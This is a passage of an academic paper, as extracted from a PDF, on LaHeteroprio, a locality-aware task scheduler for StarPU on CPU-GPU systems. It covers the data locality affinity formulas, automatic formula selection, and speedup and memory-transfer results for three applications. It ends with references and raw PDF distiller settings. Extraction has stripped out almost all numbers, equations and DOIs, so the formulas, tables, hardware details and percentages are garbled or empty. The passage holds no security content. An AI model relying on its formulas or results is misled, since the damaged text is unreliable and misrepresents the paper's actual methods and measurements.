principles, where we attribute more weight to the write accesses to reduce the importance of the read accesses. the ls_sdh is the score given by summing the amount of data already on a node, but the difference with ls_sdh is that each data in write is counted in a quadratic manner ls sdh ðm; tÞ ¼ x d dreadt;m d:size @ a þ x d dwritet;m d:size @ a: ( ) alternatively, we propose the ls_sdhb score where we sum the amount of data on a node but we balance the data in write with a coefficient h. moreover, we consider that for the same amount of data on two memory nodes, the one that has more pieces of data should be prioritized. in other words, transferring the same amount of data but with more items is considered more expensive. the formula is given by ls sdhbðm; tÞ ¼ x d dreadt;m d:size @ a þ u � �ðdwritet;m Þ � x d dwritet;m d:size @ a: ( ) we set h = , for the rest of the study as it provides an important load to the data in write without canceling the cost of huge transfer for data in read. finally, we propose the lc_smwb cost formula lc smwbðm; tÞ ¼ x d dreadt;:m d:size @ a þ x d dwritet;:m d:size � � �ðt:data \ writeÞ �ðt:dataÞ @ a: ( ) bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in lc_smwb, we sum the amount of data that is going to be moved, but we use an extra coefficient for the data in write. this coefficient takes the value if all the data used by t are in write, but it gets closer to as the number of data dependencies in read gets larger than the number of data dependencies in write. examples of memory node selection table illustrates how the formulas behave and which memory nodes are selected for different configurations. this example shows that the formulas can select different memory nodes depending both on the number of data dependencies in read/write and their sizes. automatic dlaf selection we propose several data locality affinity formulas (dlaf) but only one of them is used to find out the best memory node when a newly ready task is pushed into the scheduler. we describe here our mechanism to automatically select a dlaf during the execution by comparing their best memory node difference (bmd) values. a bmd value indicates the robustness of a dlaf by counting how many times it returns a different node id when a task is pushed or popped. more precisely, every time a task t is pushed, we call a dlaf to know which of the memory nodes is selected to execute the task, and we store this information inside the scheduler. then, every time a task is popped, we call again the same dlaf to know which of the memory node seems the more appropriate to execute the task, and we compare this value with the one obtained at push time, as illustrated by fig. . if both values are different, we increase the bmd counter. a low bmd value means that the dlaf is robust to the changes in the memory during the push/pop elapsed time. we consider that this robustness is a good metric to automatically select a dlaf, and thus we continually compared the bmd counters of all dlaf, and use the one that has the lowest value to select the list where to push the tasks. iterating order on the lists of the grid (pop) in this section, we describe how the workers iterate over the task-lists of g. table examples of memory node selection by the proposed dlaf for different tasks and data configurations. tasks(data/access mode/size, : : : ) mn hosts mn hosts mn hosts ls_dh winner ls_sdh winner ls_sdhb winner lc_smwb winner t(a/r/ , b/w/ ) a a b mn{ , , } mn{ , , } mn mn t(a/r/ , b/w/ ) a a b b mn mn mn mn t(a/w/ , b/w/ , c/w/ ) a b c a c mn mn mn mn t(a/w/ , b/w/ , c/w/ ) a b a b a c mn{ , , } mn{ , , } mn{ , , } mn{ , , } t(a/r/ , b/r/ , c/w/ , d/w/ ) a b a c c d mn mn mn mn t(a/w/ , b/w/ , c/w/ , d/w/ ) a d c b d mn mn mn mn t(a/w/ , b/w/ , c/w/ , d/w/ ) a d c b d mn{ , } mn mn mn{ , } note: the memory nodes are labeled mn and in the case the scores assign the best values to more than one memory nodes, all of them are written inside brackets. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ distance between memory nodes first, we build a distance matrix between the memory nodes. we defined the data transfer speed between memory nodes as an inverse of the distance; the distance is given by starpu and it is the time that takes to move a piece of data from one memory node to another distancetransferði; jÞ ¼ normalizeðstarpu transfer predictðj; i; ÞÞ: ( ) however, it is important to remember that our scheduler is based on priorities and thus we also use a second metric to look at the difference in terms of priorities between the workers of different memory nodes. more precisely, we define a priority distance between workers of different memory nodes by distancepriorityði; jÞ ¼ � pb k¼ jpði; kÞ � pðj; kÞj ðmaxðnpi; npjÞ þ Þ � ðmaxðnpi; npjÞ þ Þ= : ( ) the numerator of the fraction provides a difference factor between i and j, whereas the denominator part ensures that the values stays between and . the value is obtained when two workers used the same priority indexes. they access the same buckets in the same order. in table , we provide examples of the priority distance for two array indexes. finally, we use both distance coefficients to find a balance between priorities and memory transfer capacities, and we obtain the final measure with distanceði; jÞ ¼ distancepriorityði; jÞ � a � � þ distancetransferði; jÞ � ð � aÞð Þ: ( ) from eq. ( ), two memory nodes are close if they are well-connected and if their priorities (how their workers iterate on the buckets) are different. prioritizing locality/priorities in the access orders using the distance matrix between the memory nodes, two straightforward access orders can be considered. in the first one, we consider that data locality is more critical than the b u ck e ts figure view of the best memory node difference (bmd), which is computed by counting the number of difference returned by the dlaf between the moment when a task is pushed or popped. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ priority of the tasks; in this case, a worker iterates on all the lists related to its memory node following the priority order, and only if it cannot find a ready task it looks at the lists of the second closest memory node. the workers iterate over g(b,m) with an outer loop of indexes m and an inner loop of index b (column-by-column). in a second case, we chose priority over data locality; in this case, a worker iterates with an outer loop of indexes b and an inner loop of index m (row-by-row). one drawback of the locality-oriented access is that it pushes the priorities in the background, which means that a local task of low priority should always be done before a less local task of higher priority. on the other hand, the priority oriented access breaks the locality benefit because a worker looks at all the memory nodes’ task-lists one priority after the other. hence, both approaches are balanced using subgroups in this study. memory node subgroups we propose that each memory node sees the others as two separate groups. the idea is to maximize the exchanges with the first group of size s, and use the second group only to steal tasks to avoid being idle. to do so, we use a locality coefficient l that correspond to the number of consecutive buckets that are queried before going to the next memory node. the iterations on the grid g are done so that the worker looks at the l first buckets of its memory node, then at the l first buckets of its s closest memory nodes. this is done until all buckets of the worker’s memory node and the s subgroups have been scanned. then, in a second stage, the other memory nodes, from s + to m, are scanned bucket after bucket. both s and l parameters can be different for each memory nodes. an example of this access order strategy can be seen in table . with the settings given in the example, we use l = for the cpu workers, see table b. consequently, the cpu workers look at two buckets of the cpu memory node lists, before looking at the gpu lists. performance study configuration the following software configuration was used: gnu compiler . , cuda tookit . , intel mkl and starpu . we set the environment variables starpu_cuda_pipeline= , starpu_prefetch= and starpu_disable_pinning= . from eq. ( ), we defined a = . , and as a result the closest memory node to any gpu was always the cpu. starpu supports multi-streaming capability of modern gpus by running multiple cpu threads to compute on the same gpu. this is controlled by starpu_nworker_per_cuda table priority distance examples between buckets/priorities indexes of i and j. priorities for i priorities for j distancepriority (i,j) - . - . - - . - . - . we created our scheduler on the master branch of the official repository https:// scm.gforge.inria.fr/anonscm/git/starpu/ starpu.git at commit id e e e e c c a d d b d e bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://scm.gforge.inria.fr/anonscm/git/starpu/starpu.git https://scm.gforge.inria.fr/anonscm/git/starpu/starpu.git https://scm.gforge.inria.fr/anonscm/git/starpu/starpu.git http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and we used different values depending on the hardware and the application that was run. the set values were application specific. the automatic dlaf selection, described in the section “automatic dlaf selection,” was based on ls_sdh, ls_sdh , ls_sdhb and lc_smwb, but excluded laru and mc_starpu. hardware we used two different configurations and we refer to each of them using their corresponding gpu model. � p is composed of � dodeca-core haswell intel xeon e - v , ghz, and � p gpu (dp . teraflops). � k is composed of � dodeca-core haswell intel xeon e - v , ghz and � k gpu (dp . teraflops). applications we studied three applications to assess our method. two of them were linear algebra applications that already used starpu and heteroprio. hence, no further development was table access list examples for a configuration with one cpu and two gpus (three memory nodes in total). (a) distance matrix from eq. ( ). cpu gpu- gpu- cpu . gpu- . gpu- . (b) access order for cpu workers. priorities buckets g(*,cpu) g(*,gpu- ) g(*,gpu- ) g( ,*) g( ,*) g( ,*) g( ,*) (c) access order for gpu- workers. priorities buckets g(*,cpu) g(*,gpu- ) g(*,gpu- ) g( ,*) g( ,*) g( ,*) (d) access order for gpu- workers. priorities buckets g(*,cpu) g(*,gpu- ) g(*,gpu- ) g( ,*) g( ,*) g( ,*) note: we use four buckets, but the tasks of bucket zero are only active on cpu. the priorities—the order of access to the buckets—is reversed for the gpu workers. s, the size of closed memory node subgroup, is set to two for the cpu and to one for the gpus. finally, the locality factor l is two for both. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ needed inside them since the interfaces of heteroprio and laheteroprio are similar. the third one was a stencil application that we modified to be able to use heteroprio/ laheteroprio. � qrmumps this application uses four different types of tasks and three of them can be run on the gpus. we used starpu_nworker_per_cuda= on p , and starpu_nworker_per_cuda= on k . the test case was the factorization of the tf matrix . � spldlt this application uses four different types of tasks and only one of them can run on the gpus. consequently, to select a task for a gpu, there is no choice in terms of bucket/priority but only in terms of memory node. we used starpu_nworker_per_ cuda= on p , and starpu_nworker_per_cuda= on k . the test case was the cholesky factorization of a , � , matrix. � starpu-stencil this application is a stencil simulation of the game life, which is available as an example in the starpu repository. it uses only one type of tasks that can run on cpu or gpu. consequently, to select a task for any of the processing unit, there is no choice in terms of bucket/priority but only in terms of memory node. we used starpu_nworker_per_cuda= on p and k . the test case was a grid of dimension , executed for iterations. metrics in our tests, we evaluated two different speedups. the first was the speedup-from-average (sfa), which represents the average execution times of heteroprio based for six executions, divided by the average execution times of a target for six executions. the second was the speedup-from-minimum (sfm), which represents the lowest execution time of heteroprio divided by the lowest execution time of a target, therefore, both were obtained from a single execution. the sfa provides information of the average performance that can be expected whereas the sfm provides information about the variability and gives us an idea of what could be achieved if the executions were always perfect. evaluation of the locality coefficient for all dlaf we first evaluated the effect of the locality coefficient l, described in the section “memory node subgroups,” on the execution time and summarized the results in fig. . then, we looked at the speedup of laheteroprio against heteroprio for different l settings with three different comparisons. in the first one, we used all the average execution times obtained using laheteroprio without dissociating the different dlaf; in the second one we computed the speedup using only the best dlaf (with the lowest average), and in the third one we compared the unique best execution over all of both heteroprio and laheteroprio. focusing on qrmumps, it can be seen in figs. a and b that the best performance was obtained when we prioritized the locality for the gpu with lgpu = . the locality coefficient for the cpu seems less critical and the speedup is more or less the same for all lcpu values. when the number of gpus increases, the influence of l decreases, and we the matrix had been taken from the suitesparse matrix collection at https://sparse.tamu.edu/ bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://sparse.tamu.edu/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (a) qrmumps/k (b) qrmumps/p (c) spldlt/k (d) spldlt/p (e) starpu-stencil/k (f) starpu-stencil/p figure speedup results of laheteroprio against heteroprio for qrmumps (a, b), spldlt (c, d) and starpu-stencil (e, f) on k or p configurations. the x-axis is used of the different l pairs of the form (lcpu, lgpu). the gray bars (▪) represent sfa for all dlaf and gives an idea of the speedup of laheteroprio, here each configuration is executed six times. the light gray bars (▪) represent the sfm of the dlaf with the best speedup in average. the lines (- � -) represent the sfm using the best execution times among all dlaf, that is the speedup when we compare the best single execution using heteroprio and laheteroprio. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ had similar executions with two p gpus or four k gpus for all l values. however, the speedup against heteroprio was still significant, which means that splitting the buckets into several lists is beneficial as soon as the workers pick first in the list that corresponds to their memory node for their highest priority bucket. also, it seems that the way they iterate on the grid does not have any effect. the results for spldlt are provided in figs. c and d. here, the impact of l seems to be limited, but it is worth remembering that the gpu can only compute one type of task. on the other hand, the speedup obtained using all dlaf was unstable and significantly lower compared to the speedups obtained when we used only the best dlaf. this suggests that there are significant differences in performance among the different dlaf and also that some of them are certainly not efficient. the results that we provide in the next section corroborates this hypothesis. the results for starpu-stencil are provided in figs. e and f. there is no choice in the value l because there is only one type of task. the speedup obtained using all dlaf was unstable and significantly lower compared to the speedups obtained when we used only the best dlaf, which again suggests that the different dlaf provide heterogeneous efficiency. execution details using the performance results of section “evaluation of the locality coefficient for all dlaf,” we used a l = ( , ) for qrmumps, and a l = ( , ) for spldlt. we evaluated the performance of the different dlaf described in the section “task insertion in the grid with locality evaluation (push),” looking for the speedup against heteroprio, the amount of memory transfer, and the bmd, see figs. – . speedup we provide the speedup obtained with our method against heteroprio in figs. a and b for qrmumps, figs. a and b for spldlt, and figs. a and b for starpu-stencil. for all configurations, the laru and mc_starpu formulas did not significantly improve the execution, furthermore, they were slower than heteroprio in some cases. for laru, this means that having one piece of data already on the memory node and neglecting the others is not efficient. meanwhile, for mc_starpu, it means that putting a task on the memory node for which it is the cheapest in terms of data transfer is not the best choice. this is not surprising, since this kind of decision would make sense if we have only one task to compute. however, we clearly see that in the present study, when we had to deal with a graph of tasks, where the data were used concurrently and could be re-used by other tasks, this was not accurate. nevertheless, this result could also have been affected from inaccurate predictions made by starpu. comparing the different dlaf, it can be seen that both ls_sdh and ls_sdhb significantly improved the three applications. lc_smwb was competitive for qrmumps and starpu-stencil but not for spldlt, and ls_sdh was competitive for starpu-stencil but not for qrmumps and it had poor performance for spldlt. the main difference between ls_sdh /ls_sdhb and lc_smwb/ls_sdh is that the second ones are not bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (a) qrmumps/k - speedup (b) qrmumps/p - speedup (c) qrmumps/k - memory transfer (d) qrmumps/p - memory transfer (e) qrmumps/k - bmd (f) qrmumps/p - bmd figure execution details for qrmumps on k or p configurations for a locality coefficient l = ( , ). the speedup (a, b) includes sfa (▪) and sfm (- � -). the memory transfers (c, d) and bmd (e, f) are average values. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (a) spldlt/k - speedup (b) spldlt/p - speedup (c) spldlt/k - memory transfer (d) spldlt/p - memory transfer (e) spldlt/k - bmd (f) spldlt/p - bmd figure execution details for spldlt on k or p configurations for a locality coefficient l = ( , ). the speedup (a, b) includes sfa (▪) and sfm (- � -). the memory transfers (c, d) and bmd (e, f) are average values. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (a) starpu-stencil/k - speedup (b) starpu-stencil/p - speedup (c) starpu-stencil/k - memory transfer (d) starpu-stencil/p - mem- ory transfer (e) starpu-stencil/k - bmd (f) starpu-stencil/p - bmd figure execution details for starpu-stencil on k or p configurations for a locality coefficient l = ( , ). the speedup (a, b) includes sfa (▪) and sfm (- � -). the memory transfers (c, d) and bmd (e, f) are average values. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ giving an important load to the pieces of data used in write, and ls_sdh does not even make a distinction between read and write. it seems that taking into account write is important for qrmumps and spldlt but not for starpu-stencil. on the two linear algebra applications, the tasks transform the blocks of the matrix, and many of the blocks are written several times before being read multiple times. on the contrary in starpu-stencil, each block is written once per iteration and read only to compute the close neighbors. while the results from the different dlaf are diverse, our automatic formula selection, described in the section “automatic dlaf selection,” was efficient and always close to the best execution. consequently, there is no need to try the different dlaf as the automatic selection is reliable. transfer the total amount of memory transfer obtained with our method and heteroprio are provided in figs. c and d for qrmumps, figs. c and d for spldlt, and figs. c and d for starpu-stencil. for qrmumps, all approaches used in this study reduced the total memory transfer. however, a decrease of the memory transfer does not necessary mean having better performance. for example, for the k configuration, and with either one or two gpus, mc_starpu drastically reduced the amount of data transfer compared to heteroprio, see fig. c, but it had a negative speedup, see fig. a. it means that, even if in all laheteroprio-based executions the workers iterated similarly on g, the placement of the tasks on the grid can be quite efficient in terms of transfer, but it penalized the whole execution. in the case of spldlt, the memory transfer did not decrease compared to heteroprio when mc_starpu, laru, or ls_sdh were used. this further supports our idea that the data in write should count more than the data in read. moreover, lc_smwb balances the data in write but only with a factor at most; even if it reduced the memory transfer compared to heteroprio, the reduction was not as large compared with ls_sdh /ls_sdhb. finally, when we used spldlt the amount of memory transfer and the execution time were reduced. looking at the results of starpu-stencil, the memory transfer reduction was not as strong as for qrmumps. in addition, there is a correlation between the transfer reduction and the resulting speedup, such that the lowest amount of transfer were obtained with ls_sdh, ls_smwb and ls_sdhb for most of the configurations. again, the automatic mode is efficient and even when one of the dlaf is not competitive, for instance lc_smwb in the case of qrmumps/spldlt or lc_sdh for starpu-stencil, the automatic system is robust enough to make correct decisions and remains competitive. bmd we provide the bmd values for the different dlaf in figs. e and f for qrmumps, figs. e and f for spldlt, and figs. e and f for starpu-stencil. for qrmumps, the bmd values were low for all formulas except ls_sdh and laru. these measures proof that ls_sdh is sensitive to the data changes that happen in the bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ time that takes a pushed task to be popped. furthermore, this is due to its formula as it considers the data in read or write to be the same. on the other hand, mc_starpu was stable with a small bmd value. however, this is surprising, because the high value for ls_sdh illustrates the volatility of the data, and thus mc_starpu should also be sensitive to the changes that happened between push/pop. for spldlt and starpu-stencil, we observed a clear relation between the bmd values and the speedup. the formulas that did not provide a speedup are the ones with the highest bmd values. this validates the construction of our automatic method that uses the dlaf with the lowest bdm. in the three applications, the laru has a special meaning when looking at the bmd value. when a task is pushed, laru returns the id of the memory node of the worker that push the task and similarly, when a task is popped, laru returns the id of the memory node of the worker that pop the task. therefore, the laru’s bdm value is the percentage of tasks that are pushed and popped by worker related to different memory nodes. therefore, we see that in qrmumps up to % of the tasks were stolen but this number grow up to % for starpu-stencil and % for spldlt. summary of the evaluation the speedup obtained with laheteroprio was really significant. in most cases, there was a proportional relation between memory transfer and execution time, which means that reducing memory transfer caused a reduction in the time needed to execute the task. the bmd metric is valuable to evaluate the robustness of dlaf and it can be used to predict its performance. moreover, our automatic dlaf selection based on bmd was highly competitive with a speedup close to the best-achieved executions. finally, laheteroprio reduced the amount of memory transfer with any number of gpus for the three applications. conclusion we have improved our heteroprio scheduler with a new mechanism that considers data locality. the new system divides the task buckets into as many lists as there are memory nodes. we have created different formulas to evaluate the locality of a task regarding a memory node, and we found that formulas that omit many parameters (as the use of the starpu prediction functions) provide a low performance; this is probably due to the neglect of the type of accesses of the tasks on the data. nevertheless, we have shown that locality evaluation is more sensitive to write accesses and this has been validated with the results of the bmd metric. concerning the pop strategy, it is necessary to set the locality coefficient to the largest value for the gpus, to ensure that workers focus on locality before priorities. it is possible to use our new scheduler, without introducing additional information or modification, using our automatic dlaf selection system, which is close to the best executions in most cases. finally, our new scheduler improves the performance of qrmumps, spldlt and starpu-stencil by %, % and %, respectively. it also reduces the data transfer more than %. in terms of perspective, the scheduler could still be improved on different aspects. it could be beneficial to change the distance between the memory nodes at runtime, bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ which means changing the victims of the work stealing and even having workers of the same memory node that steal the tasks on other memory nodes. in addition, the original priorities of the scheduler are set per architecture, and the new locality heuristic is set per memory node, but a finer approach could be interesting even if it has a challenging tuning and setup. for example, we could have one worker per gpu that uses a different access order over the buckets with the objective of avoiding some transfers. finally, we would like to study laheteroprio on other kinds of applications with more diverse types of tasks, and on different type of hardware configurations. acknowledgements the experiments presented in this paper were carried out using the plafrim experimental testbed, supported by inria, cnrs (labri and imb), université de bordeaux, bordeaux inp and conseil régional d’aquitaine (see https://www.plafrim.fr/). we would like to thank alfredo buttari for his support on qrmumps, and florent lopez for his support on spldlt. additional information and declarations funding there was no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � bérenger bramas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the supplemental files include the source code of the scheduler and the details of the executions of qrmumps and spldlt in two raw data/csv files. these results were used to generate the figures for the article but they also contain additional information not presented in the article. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references agullo e, aumage o, bramas b, coulaud o, pitoiset s. . bridging the gap between openmp and task-based runtime systems for the fast multipole method. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://www.plafrim.fr/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ agullo e, beaumont o, eyraud-dubois l, kumar s. a. are static schedules so bad? a case study on cholesky factorization. in: ieee international parallel and distributed processing symposium (ipdps). piscataway: ieee, – doi . /ipdps. . . agullo e, bramas b, coulaud o, darve e, messner m, takahashi t. b. task-based fmm for heterogeneous architectures. concurrency and computation: practice and experience ( ): – doi . /cpe. . agullo e, buttari a, guermouche a, lopez f. . task-based multifrontal qr solver for gpu-accelerated multicore architectures. in: ieee nd international conference on high performance computing (hipc). washington, d.c.: ieee computer society, – doi . /hipc. . . akbudak k, ltaief h, mikhalev a, charara a, keyes de. . exploiting data sparsity for large-scale matrix computations. in: euro-par : parallel processing. euro-par . new york: springer. al-omairy r, miranda g, ltaief h, rosa b, martorell x, labarta j, keyes d. . dense matrix computations on numa architectures with distance-aware work stealing. supercomputing frontiers and innovations ( ): – doi . /jsfi . augonnet c, thibault s, namyst r, wacrenier p-a. . starpu: a unified platform for task scheduling on heterogeneous multicore architectures. concurrency and computation: practice and experience ( ): – doi . /cpe. . baptiste p, pape cl, nuijten w. . constraint-based scheduling. norwell: kluwer academic publishers. bauer m, treichler s, slaughter e, aiken a. . legion: expressing locality and independence with logical regions. in: international conference on high performance computing, networking, storage and analysis. washington, d.c.: ieee computer society press, . beaumont o, cojean t, eyraud-dubois l, guermouche a, kumar s. . scheduling of linear algebra kernels on multiple heterogeneous resources. in: ieee rd international conference on high performance computing (hipc). piscataway: ieee, – doi . /hipc. . . beaumont o, eyraud-dubois l, kumar s. . approximation proofs of a fast and efficient list scheduling algorithm for task-based runtime systems on multicores and gpus. in: ieee international parallel and distributed processing symposium (ipdps). piscataway: ieee, – doi . /ipdps. . . beaumont o, eyraud-dubois l, kumar s. . fast approximation algorithms for task-based runtime systems. concurrency and computation: practice and experience ( ):e doi . /cpe. . bramas b. . optimization and parallelization of the boundary element method for the wave equation in time domain. phd thesis. bordeaux university. the�se de doctorat dirigée par coulaud, olivier informatique bordeaux . carpaye jmc, roman j, brenner p. . design and analysis of a task-based parallelization over a runtime system of an explicit finite-volume cfd code with adaptive time stepping. journal of computational science : – doi . /j.jocs. . . . danalis a, bosilca g, bouteiller a, herault t, dongarra j. . ptg: an abstraction for unhindered parallelism. in: proceedings of the fourth international workshop on domain- specific languages and high-level frameworks for high performance computing, (wolfhpc), ieee. washington, d.c.: ieee computer society, – . gautier t, lima jv, maillard n, raffin b. . xkaapi: a runtime system for data-flow task programming on heterogeneous architectures. in: parallel & distributed processing (ipdps), bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /ipdps. . http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /hipc. . http://dx.doi.org/ . /jsfi http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /hipc. . http://dx.doi.org/ . /ipdps. . http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /j.jocs. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ieee th international symposium on. piscataway: ieee, – doi . /ipdps. . . he k, meng x, pan z, yuan l, zhou p. . a novel task-duplication based clustering algorithm for heterogeneous computing environments. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . kale lv, krishnan s. . charm++: a portable concurrent object oriented system based on c++. in: acm sigplan notices. vol. . new york: acm, – doi . / . . lopez f, duff is. . task-based sparse direct solver for symmetric indefinite systems. pmaa, task-based programming for scientific computing ms, zurich, switzerland. moustafa s, kirschenmann w, dupros f, aochi h. . task-based programming on emerging parallel architectures for finite-differences seismic numerical kernel. in: th international conference on parallel and distributed computing (euro-par ), euro-par : parallel processing. new york: springer doi . / - - - - _ . perez jm, badia rm, labarta j. . a dependency-aware task-based programming environment for multi-core architectures. in: cluster computing, ieee international conference on. piscataway: ieee, – doi . /clustr. . . peter brucker sk. . complexity results for scheduling problems. available at http://www .informatik.uni-osnabrueck.de/knust/class/ (accessed december ). shetti kr, fahmy sa, bretschneider t. . optimization of the heft algorithm for a cpu-gpu environment. in: international conference on parallel and distributed computing, applications and technologies. piscataway: ieee, – doi . /pdcat. . . sukkari d, ltaief h, faverge m, keyes d. . asynchronous task-based polar decomposition on single node manycore architectures. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . thoman p, dichev k, heller t, iakymchuk r, aguilar x, hasanov k, gschwandtner p, lemarinier p, markidis s, jordan h, fahringer t, katrinis k, laure e, nikolopoulos ds. . a taxonomy of task-based parallel programming technologies for high-performance computing. journal of supercomputing ( ): – doi . /s - - - . tillenius m. . superglue: a shared memory framework using data versioning for dependency-aware task-based parallelization. siam journal on scientific computing ( ):c –c doi . / . topcuoglu h, hariri s, wu m-y. . performance-effective and low-complexity task scheduling for heterogeneous computing. ieee transactions on parallel and distributed systems ( ): – doi . / . . unat d, dubey a, hoefler t, shalf j, abraham m, bianco m, chamberlain bl, cledat r, carter edwards h, finkel h, fuerlinger k, hannig f, jeannot e, kamil a, keasler j, kelly phj, leung v, ltaief h, maruyama n, newburn cj, pericas m. . trends in data locality abstractions for hpc systems. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /ipdps. . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /clustr. . http://www .informatik.uni-osnabrueck.de/knust/class/ http://dx.doi.org/ . /pdcat. . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ impact study of data locality on task-based applications through the heteroprio scheduler introduction background introducing laheteroprio performance study conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f 